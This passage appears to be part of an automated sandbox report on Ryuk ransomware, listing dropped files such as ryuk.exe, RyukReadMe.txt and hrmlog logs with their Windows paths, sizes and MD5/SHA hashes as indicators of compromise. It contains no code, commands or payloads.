SHA1
2da7127b50964160c78d8a8939549747f1e04d59

SHA256
91f6223124639dfd62756577c754faefb6a5622a0b3f2998224af0d55b458305

SHA512
008a494c632b2e67294a541010859db7dfa71bb89c32fdedb82b02068ba65c2e3dec6e8dba33fc5bb86f4f558ce2eec31996697e13a02d176c5410ec48628d9f

Download Submit
C:\ProgramData\RyukReadMe.txt
Filesize
1KB

MD5
f69127370e1f1aede86e881dd446f6aa

SHA1
65298f80e3b97f59ea45179463ab9c5cc3ee9337

SHA256
da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc

SHA512
5e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4

Download Submit
C:\ProgramData\hrmlog1
Filesize
2KB

MD5
1b4049234e90815e63e2f6bda5ceff5f

SHA1
4cb8630bf6ade0189185e5ef58b9a4204899b34a

SHA256
aff45e03b85266d677cc8f15b6bf0e101207361c8bdba4d37bb6fd5af79c1fa1

SHA512
a345fe9a4d942d2b47d7c1dc5620c20eb1fb4a373258a71c9234040277e2c6ad493a9941a65fa22afac89156f168cda827fec6fd68626b3ca075954d1d00b3d1

Download Submit
C:\ProgramData\hrmlog1
Filesize
2KB

MD5
1b4049234e90815e63e2f6bda5ceff5f

SHA1
4cb8630bf6ade0189185e5ef58b9a4204899b34a

SHA256
aff45e03b85266d677cc8f15b6bf0e101207361c8bdba4d37bb6fd5af79c1fa1

SHA512
a345fe9a4d942d2b47d7c1dc5620c20eb1fb4a373258a71c9234040277e2c6ad493a9941a65fa22afac89156f168cda827fec6fd68626b3ca075954d1d00b3d1

Download Submit
C:\ProgramData\hrmlog1
Filesize
2KB

MD5
1b4049234e90815e63e2f6bda5ceff5f

SHA1
4cb8630bf6ade0189185e5ef58b9a4204899b34a

SHA256
aff45e03b85266d677cc8f15b6bf0e101207361c8bdba4d37bb6fd5af79c1fa1

SHA512
a345fe9a4d942d2b47d7c1dc5620c20eb1fb4a373258a71c9234040277e2c6ad493a9941a65fa22afac89156f168cda827fec6fd68626b3ca075954d1d00b3d1

Download Submit
C:\ProgramData\hrmlog2
Filesize
292B

MD5
1633410d83909601bfd662f62ea2df7c

SHA1
c7087cbab05c76e08b44e6341f51a4b708236e02

SHA256
e50f7a6f3ba3a57c3bc645acfcb10081641ea7ba698ba19c6ff5017ef21a3e54

SHA512
01b6fa16c7c9d88ba46ce9d69811a32ac3fe47bfa77782a290c74d6b19676d0a4066736b610b07b3ad4916344aaaa0537e1b590957af2f11e93ac7ffbc86528a

Download Submit
C:\ProgramData\hrmlog2
Filesize
292B

MD5
1633410d83909601bfd662f62ea2df7c

SHA1
c7087cbab05c76e08b44e6341f51a4b708236e02

SHA256
e50f7a6f3ba3a57c3bc645acfcb10081641ea7ba698ba19c6ff5017ef21a3e54

SHA512
01b6fa16c7c9d88ba46ce9d69811a32ac3fe47bfa77782a290c74d6b19676d0a4066736b610b07b3ad4916344aaaa0537e1b590957af2f11e93ac7ffbc86528a

Download Submit
C:\ProgramData\hrmlog2
Filesize
292B

MD5
1633410d83909601bfd662f62ea2df7c

SHA1
c7087cbab05c76e08b44e6341f51a4b708236e02

SHA256
e50f7a6f3ba3a57c3bc645acfcb10081641ea7ba698ba19c6ff5017ef21a3e54

SHA512
01b6fa16c7c9d88ba46ce9d69811a32ac3fe47bfa77782a290c74d6b19676d0a4066736b610b07b3ad4916344aaaa0537e1b590957af2f11e93ac7ffbc86528a

Download Submit
C:\ProgramData\ryuk.exe
Filesize
767KB

MD5
d2e194259106bca3b42dc8690d340b59

SHA1
edcd63a3125854ed72cb5811f08644a87e265e3b

SHA256
788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc

SHA512
4cecf1db68cd71b92b2e968719a365397b3ccd16340a952a8901647e9829b0a6e8d4cb1f948fb792f2cc58e4f6e289fd81cb104b43ddc8469c0671935e653a13

Download Submit
C:\Users\Admin\AppData\Local\Temp\RYUKID
Filesize
8B

MD5
2e57aabba468aa3790686fa1def14a85

SHA1
5c3decfd2de0f04ccd552403344c854bcefb4b4a

SHA256
c3c894e3a67f0e834dd44772004e00af307002d450f78ee14f520d4682e6e4c3

SHA512
c15193315bdf008c95f85e0417c107a7d7dfea60d903db7afcccfcf6201e17c758dc81f1d69a370d0f76c1cbc64bc1a22ea355171861b09ed9fd2e3a1f67871e

Download Submit
C:\Users\Admin\AppData\Local\Temp\hrmlog1
Filesize
2KB

MD5
1b4049234e90815e63e2f6bda5ceff5f

SHA1
4cb8630bf6ade0189185e5ef58b9a4204899b34a

SHA256
aff45e03b85266d677cc8f15b6bf0e101207361c8bdba4d37bb6fd5af79c1fa1

SHA512
a345fe9a4d942d2b47d7c1dc5620c20eb1fb4a373258a71c9234040277e2c6ad493a9941a65fa22afac89156f168cda827fec6fd68626b3ca075954d1d00b3d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\hrmlog2
Filesize
292B

MD5
1633410d83909601bfd662f62ea2df7c

SHA1
c7087cbab05c76e08b44e6341f51a4b708236e02

SHA256
e50f7a6f3ba3a57c3bc645acfcb10081641ea7ba698ba19c6ff5017ef21a3e54

SHA512
01b6fa16c7c9d88ba46ce9d69811a32ac3fe47bfa77782a290c74d6b19676d0a4066736b610b07b3ad4916344aaaa0537e1b590957af2f11e93ac7ffbc86528a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe
Filesize
767KB

MD5
d2e194259106bca3b42dc8690d340b59

SHA1
edcd63a3125854ed72cb5811f08644a87e265e3b

SHA256
788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc

SHA512
4cecf1db68cd71b92b2e968719a365397b3ccd16340a952a8901647e9829b0a6e8d4cb1f948fb792f2cc58e4f6e289fd81cb104b43ddc8469c0671935e653a13

Download Submit